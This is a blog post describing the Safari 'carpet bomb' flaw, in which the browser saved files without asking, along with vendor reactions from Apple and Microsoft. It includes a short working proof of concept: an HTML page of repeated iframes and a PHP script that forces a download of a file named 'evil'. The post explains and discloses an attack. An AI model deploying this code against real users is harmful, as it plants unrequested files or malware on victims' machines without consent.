Most of you may know what Safari is. If you don’t, let me brief describe it in few words. Safari is a very typical web browser like Firefox and Internet Explorer, which is developed by Apple. As a general user of Mac OS, it is very usual that Safari does not ask for user permission when going to download file. It may not be a security problem to most user, but some annoying things can be done by use this feature of Safari. Consider there is a site http://iam.not.evil/, the index page of it contains following code.
<html>
<body>
<iframe src=”get_file.php”></iframe>
<iframe src=”get_file.php”></iframe>
<iframe src=”get_file.php”></iframe>
…
<iframe src=”get_file.php”></iframe>
</body>
</html>
Inside get_file.php, we are going to send a file to user. My attempt is as follow.
<?php
$data = file_get_contents(“evil”);
header(‘Content-Type: application/x-zip’);
header(‘Content-Length: ‘ . strlen($data));
header(‘Content-Disposition: attachment; filename=evil’);
die($data);
?>
You may have a try by visiting the following site. The below site only contains one iframe trying to download a empty file evil to your computer.
http://www.cse.cuhk.edu.hk/~hkho5/security/
Since Safari will not ask user consent before downloading a file, the implication of it is obvious, downloaded malware to the victim’s desktop without user’s consent. This problem may not cause security problem in Mac OS, but it do annoying the users, after they closed the Safari and discovered that how beautiful there desktop is!
This security problem is discovered by Nitesh Dhanjani. He try to report it to Apple, but Apple thinks that it is not a security issue. Furthermore, Microsoft warn that this “special feature” of Safari may cause blended attack in Window XP and Window Vista.
“Microsoft says it is the combination of the default download file location in Safari and how the Windows desktop handles the files that creates the blended threat on all supported versions of Windows XP and Windows Vista when Apple’s Safari for Windows has been installed.” from ZDNet.co.uk
It reminds me that sometime something is very nature or usual, but it does not mean that it is reasonable or safe!
Reference:
- Safari Carpet Bomb
- Apple dismisses Safari vulnerability claims
- Microsoft warns of blended Safari attack
ps. I don’t know how Windows desktop handles files. Should you know it, please let me know.
Filed under: app sec , apple, mac, microsoft, safari, windows
